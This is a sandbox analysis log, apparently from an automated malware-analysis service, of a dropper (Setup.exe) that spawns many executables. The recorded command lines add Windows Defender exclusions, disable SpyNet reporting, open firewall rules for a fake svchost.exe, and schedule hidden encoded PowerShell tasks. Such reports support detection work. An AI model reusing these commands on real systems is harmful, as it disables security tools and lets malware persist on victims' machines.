PID 2756 wrote to memory of 4356	2756	Setup.exe	OvEog_k0rRq2vTq2yHWRuUDp.exe
PID 2756 wrote to memory of 4576	2756	Setup.exe	nEvy_BKPOyBRXTvgstTFG1bb.exe
PID 2756 wrote to memory of 4576	2756	Setup.exe	nEvy_BKPOyBRXTvgstTFG1bb.exe
PID 2756 wrote to memory of 736	2756	Setup.exe	C2mjL0yzJOSGevS9KddSesM3.exe
PID 2756 wrote to memory of 736	2756	Setup.exe	C2mjL0yzJOSGevS9KddSesM3.exe
PID 2756 wrote to memory of 736	2756	Setup.exe	C2mjL0yzJOSGevS9KddSesM3.exe
PID 2756 wrote to memory of 4340	2756	Setup.exe	4bHQMka0T42XROZkCeb73yop.exe
PID 2756 wrote to memory of 4340	2756	Setup.exe	4bHQMka0T42XROZkCeb73yop.exe
PID 2756 wrote to memory of 4340	2756	Setup.exe	4bHQMka0T42XROZkCeb73yop.exe
PID 2756 wrote to memory of 3512	2756	Setup.exe	GHd7RKSCrg_QAvmEyJHe63wk.exe
PID 2756 wrote to memory of 3512	2756	Setup.exe	GHd7RKSCrg_QAvmEyJHe63wk.exe
PID 2756 wrote to memory of 4116	2756	Setup.exe	vIkrXkLfKUJQln1a6Gaizpmd.exe
PID 2756 wrote to memory of 4116	2756	Setup.exe	vIkrXkLfKUJQln1a6Gaizpmd.exe
PID 2756 wrote to memory of 4116	2756	Setup.exe	vIkrXkLfKUJQln1a6Gaizpmd.exe
PID 2756 wrote to memory of 1688	2756	Setup.exe	2iSKhk9uzFjJPqtrf6p6aIda.exe
PID 2756 wrote to memory of 1688	2756	Setup.exe	2iSKhk9uzFjJPqtrf6p6aIda.exe
PID 2756 wrote to memory of 1688	2756	Setup.exe	2iSKhk9uzFjJPqtrf6p6aIda.exe
PID 2756 wrote to memory of 3960	2756	Setup.exe	OAsR5ZWusgUixOoCHaIdjvFY.exe
PID 2756 wrote to memory of 3960	2756	Setup.exe	OAsR5ZWusgUixOoCHaIdjvFY.exe
PID 2756 wrote to memory of 3960	2756	Setup.exe	OAsR5ZWusgUixOoCHaIdjvFY.exe
PID 2756 wrote to memory of 4676	2756	Setup.exe	hnq09WIP8wki9MFqUwtov71r.exe
PID 2756 wrote to memory of 4676	2756	Setup.exe	hnq09WIP8wki9MFqUwtov71r.exe
PID 2756 wrote to memory of 4676	2756	Setup.exe	hnq09WIP8wki9MFqUwtov71r.exe
PID 2756 wrote to memory of 3220	2756	Setup.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
PID 2756 wrote to memory of 3220	2756	Setup.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
PID 2756 wrote to memory of 3220	2756	Setup.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
PID 2756 wrote to memory of 2384	2756	Setup.exe	zf7pB4X633NVJVpIfTclGYrB.exe
PID 2756 wrote to memory of 2384	2756	Setup.exe	zf7pB4X633NVJVpIfTclGYrB.exe
PID 2756 wrote to memory of 2384	2756	Setup.exe	zf7pB4X633NVJVpIfTclGYrB.exe
PID 2756 wrote to memory of 3404	2756	Setup.exe	Iu5nlalbZipJNVQzIB6UXy51.exe
PID 2756 wrote to memory of 3404	2756	Setup.exe	Iu5nlalbZipJNVQzIB6UXy51.exe
PID 2756 wrote to memory of 3404	2756	Setup.exe	Iu5nlalbZipJNVQzIB6UXy51.exe
PID 2756 wrote to memory of 3100	2756	Setup.exe	Conhost.exe
PID 2756 wrote to memory of 3100	2756	Setup.exe	Conhost.exe
PID 2756 wrote to memory of 3100	2756	Setup.exe	Conhost.exe
PID 2756 wrote to memory of 4272	2756	Setup.exe	1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
PID 2756 wrote to memory of 4272	2756	Setup.exe	1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
PID 2756 wrote to memory of 4272	2756	Setup.exe	1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
PID 2756 wrote to memory of 1240	2756	Setup.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
PID 2756 wrote to memory of 1240	2756	Setup.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
PID 2756 wrote to memory of 1240	2756	Setup.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
PID 2756 wrote to memory of 2336	2756	Setup.exe	zyqHvLYwG6Z_hwVXCvyY7WhH.exe
PID 2756 wrote to memory of 2336	2756	Setup.exe	zyqHvLYwG6Z_hwVXCvyY7WhH.exe
PID 2756 wrote to memory of 2336	2756	Setup.exe	zyqHvLYwG6Z_hwVXCvyY7WhH.exe
PID 2756 wrote to memory of 3732	2756	Setup.exe	5gwN2rc7rJuV206DfYnLxwQ7.exe
PID 2756 wrote to memory of 3732	2756	Setup.exe	5gwN2rc7rJuV206DfYnLxwQ7.exe
PID 2756 wrote to memory of 3732	2756	Setup.exe	5gwN2rc7rJuV206DfYnLxwQ7.exe
PID 4764 wrote to memory of 1240	4764	WerFault.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
PID 4764 wrote to memory of 1240	4764	WerFault.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
PID 4824 wrote to memory of 4676	4824	WerFault.exe	hnq09WIP8wki9MFqUwtov71r.exe
PID 4824 wrote to memory of 4676	4824	WerFault.exe	hnq09WIP8wki9MFqUwtov71r.exe
PID 2756 wrote to memory of 4216	2756	Setup.exe	0V5XIqHYMI_CzzeaAxeeZXT_.exe
PID 2756 wrote to memory of 4216	2756	Setup.exe	0V5XIqHYMI_CzzeaAxeeZXT_.exe
PID 2756 wrote to memory of 4216	2756	Setup.exe	0V5XIqHYMI_CzzeaAxeeZXT_.exe
PID 4672 wrote to memory of 3220	4672	WerFault.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
PID 4672 wrote to memory of 3220	4672	WerFault.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
PID 2384 wrote to memory of 2284	2384	zf7pB4X633NVJVpIfTclGYrB.exe	Install.exe
PID 2384 wrote to memory of 2284	2384	zf7pB4X633NVJVpIfTclGYrB.exe	Install.exe
PID 2384 wrote to memory of 2284	2384	zf7pB4X633NVJVpIfTclGYrB.exe	Install.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2756

C:\Users\Admin\Documents\6v2TGjpLMbRs4sA0svjAwkP8.exe
"C:\Users\Admin\Documents\6v2TGjpLMbRs4sA0svjAwkP8.exe"
2⤵
- Executes dropped EXE
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 624
3⤵
- Program crash
PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 632
3⤵
- Program crash
PID:5616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 760
3⤵
- Program crash
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 840
3⤵
- Program crash
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 1260
3⤵
- Program crash
PID:5560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 1268
3⤵
- Program crash
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 1208
3⤵
- Program crash
PID:2904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "6v2TGjpLMbRs4sA0svjAwkP8.exe" /f & erase "C:\Users\Admin\Documents\6v2TGjpLMbRs4sA0svjAwkP8.exe" & exit
3⤵
PID:2852

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "6v2TGjpLMbRs4sA0svjAwkP8.exe" /f
4⤵
- Kills process with taskkill
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 1400
3⤵
- Program crash
PID:5724

C:\Users\Admin\Documents\C2mjL0yzJOSGevS9KddSesM3.exe
"C:\Users\Admin\Documents\C2mjL0yzJOSGevS9KddSesM3.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:736

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
3⤵
PID:5216

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
4⤵
PID:5660

C:\Users\Admin\Documents\gXyTOnnk3IUcq5w0DBuB4GBv.exe
"C:\Users\Admin\Documents\gXyTOnnk3IUcq5w0DBuB4GBv.exe"
2⤵
- Executes dropped EXE
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3220 -s 380
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3220 -s 472
3⤵
- Program crash
PID:5296

C:\Users\Admin\Documents\Iu5nlalbZipJNVQzIB6UXy51.exe
"C:\Users\Admin\Documents\Iu5nlalbZipJNVQzIB6UXy51.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3404

C:\Users\Admin\Documents\K0RPKB0dkSPoxyfnoK66H4Ty.exe
"C:\Users\Admin\Documents\K0RPKB0dkSPoxyfnoK66H4Ty.exe"
2⤵
- Executes dropped EXE
PID:1240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 464
3⤵
- Program crash
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 472
3⤵
- Program crash
PID:5528

C:\Users\Admin\Documents\XoIfZiA0nshRAqpT3wcLc1rV.exe
"C:\Users\Admin\Documents\XoIfZiA0nshRAqpT3wcLc1rV.exe"
2⤵
PID:4272

C:\Users\Admin\Documents\XoIfZiA0nshRAqpT3wcLc1rV.exe
"C:\Users\Admin\Documents\XoIfZiA0nshRAqpT3wcLc1rV.exe"
3⤵
- Executes dropped EXE
PID:1352

C:\Users\Admin\Documents\diqeqNFylOVJ08GykUsbQ_CF.exe
"C:\Users\Admin\Documents\diqeqNFylOVJ08GykUsbQ_CF.exe"
2⤵
PID:3100

C:\Users\Admin\Documents\zf7pB4X633NVJVpIfTclGYrB.exe
"C:\Users\Admin\Documents\zf7pB4X633NVJVpIfTclGYrB.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2384

C:\Users\Admin\AppData\Local\Temp\7zSFB17.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
PID:2284

C:\Users\Admin\AppData\Local\Temp\7zS1D73.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
- Executes dropped EXE
PID:5176

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:5952

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:3640

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:1488

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:3580

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:6100

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:4292

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:4368

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:4816

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gGCXjixiU" /SC once /ST 00:10:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:5288

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gGCXjixiU"
5⤵
PID:5540

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gGCXjixiU"
5⤵
PID:3260

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 03:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\nJJWzIy.exe\" j1 /site_id 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:5416

C:\Users\Admin\Documents\hnq09WIP8wki9MFqUwtov71r.exe
"C:\Users\Admin\Documents\hnq09WIP8wki9MFqUwtov71r.exe"
2⤵
- Executes dropped EXE
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 464
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 472
3⤵
- Program crash
PID:5416

C:\Users\Admin\Documents\5gwN2rc7rJuV206DfYnLxwQ7.exe
"C:\Users\Admin\Documents\5gwN2rc7rJuV206DfYnLxwQ7.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:3732

C:\Users\Admin\Pictures\Adobe Films\9SABERlvbUmGLiBgqij58uRO.exe
"C:\Users\Admin\Pictures\Adobe Films\9SABERlvbUmGLiBgqij58uRO.exe"
3⤵
PID:5828

C:\Users\Admin\Pictures\Adobe Films\0fTOkwMzGTikkCpwCObj3Frm.exe
"C:\Users\Admin\Pictures\Adobe Films\0fTOkwMzGTikkCpwCObj3Frm.exe"
3⤵
PID:3564

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\HUUe.cpL",
4⤵
PID:5948

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\HUUe.cpL",
5⤵
PID:2248

C:\Users\Admin\Documents\0V5XIqHYMI_CzzeaAxeeZXT_.exe
"C:\Users\Admin\Documents\0V5XIqHYMI_CzzeaAxeeZXT_.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:4216

C:\Users\Admin\AppData\Local\Temp\1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
"C:\Users\Admin\AppData\Local\Temp\1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4272

C:\Users\Admin\Documents\zyqHvLYwG6Z_hwVXCvyY7WhH.exe
"C:\Users\Admin\Documents\zyqHvLYwG6Z_hwVXCvyY7WhH.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2336

C:\Users\Admin\Documents\zyqHvLYwG6Z_hwVXCvyY7WhH.exe
C:\Users\Admin\Documents\zyqHvLYwG6Z_hwVXCvyY7WhH.exe
3⤵
PID:5832

C:\Users\Admin\Documents\OAsR5ZWusgUixOoCHaIdjvFY.exe
"C:\Users\Admin\Documents\OAsR5ZWusgUixOoCHaIdjvFY.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3960

C:\Users\Admin\Documents\2iSKhk9uzFjJPqtrf6p6aIda.exe
"C:\Users\Admin\Documents\2iSKhk9uzFjJPqtrf6p6aIda.exe"
2⤵
- Executes dropped EXE
PID:1688

C:\Users\Admin\Documents\vIkrXkLfKUJQln1a6Gaizpmd.exe
"C:\Users\Admin\Documents\vIkrXkLfKUJQln1a6Gaizpmd.exe"
2⤵
- Executes dropped EXE
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1640
3⤵
- Program crash
PID:6096

C:\Users\Admin\Documents\GHd7RKSCrg_QAvmEyJHe63wk.exe
"C:\Users\Admin\Documents\GHd7RKSCrg_QAvmEyJHe63wk.exe"
2⤵
- Executes dropped EXE
PID:3512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
3⤵
PID:3048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
3⤵
PID:1452

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:5980

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:4500

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
3⤵
- Creates scheduled task(s)
PID:5052

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3100

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
3⤵
PID:5940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
4⤵
PID:1584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
4⤵
PID:5304

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:5888

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:368

C:\Users\Admin\Documents\4bHQMka0T42XROZkCeb73yop.exe
"C:\Users\Admin\Documents\4bHQMka0T42XROZkCeb73yop.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4340

C:\Users\Admin\Documents\nEvy_BKPOyBRXTvgstTFG1bb.exe
"C:\Users\Admin\Documents\nEvy_BKPOyBRXTvgstTFG1bb.exe"
2⤵
- Executes dropped EXE
PID:4576

C:\Users\Admin\Documents\vKtfv4T62RKvC6cz1OaXcNVv.exe
"C:\Users\Admin\Documents\vKtfv4T62RKvC6cz1OaXcNVv.exe"
2⤵
PID:4356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1240 -ip 1240
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3220 -ip 3220
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4060 -ip 4060
1⤵
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4676 -ip 4676
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:4824

C:\Users\Admin\Documents\WlRDkm0z7K7ChBDrIiHsKW3e.exe
"C:\Users\Admin\Documents\WlRDkm0z7K7ChBDrIiHsKW3e.exe"
1⤵
- Executes dropped EXE
PID:4460

C:\Users\Admin\Pictures\Adobe Films\Rs9QJQ4Gl6hSIADXIz614t3J.exe
"C:\Users\Admin\Pictures\Adobe Films\Rs9QJQ4Gl6hSIADXIz614t3J.exe"
2⤵
PID:5988

C:\Users\Admin\Pictures\Adobe Films\NcM9Ks2UeHvkPwnXDfhuERsq.exe
"C:\Users\Admin\Pictures\Adobe Films\NcM9Ks2UeHvkPwnXDfhuERsq.exe"
2⤵
PID:3736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 616
3⤵
- Program crash
PID:3388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 628
3⤵
- Program crash
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 624
3⤵
- Program crash
PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 824
3⤵
- Program crash
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 772
3⤵
- Program crash
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 864
3⤵
- Program crash
PID:3700

C:\Users\Admin\Pictures\Adobe Films\OvEog_k0rRq2vTq2yHWRuUDp.exe
"C:\Users\Admin\Pictures\Adobe Films\OvEog_k0rRq2vTq2yHWRuUDp.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:4356

C:\Users\Admin\AppData\Local\Temp\7zS6C7E.tmp\Install.exe
.\Install.exe
3⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\7zS7D47.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
PID:1640

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:5852

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:5896

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:5704

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:5264

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:4616

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:1512

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:2408

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggStbeqxX" /SC once /ST 00:38:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:4372

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggStbeqxX"
5⤵
PID:2448

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggStbeqxX"
5⤵
PID:5068

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 03:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\roCrebF.exe\" j1 /site_id 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:1752

C:\Users\Admin\Pictures\Adobe Films\6gtV6dlE2jmCzEiDxa2M3Jld.exe
"C:\Users\Admin\Pictures\Adobe Films\6gtV6dlE2jmCzEiDxa2M3Jld.exe"
2⤵
PID:3628

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
3⤵
PID:5584

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
4⤵
PID:5032

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
1⤵
- Creates scheduled task(s)
PID:2668

C:\Windows\SysWOW64\schtasks.exe
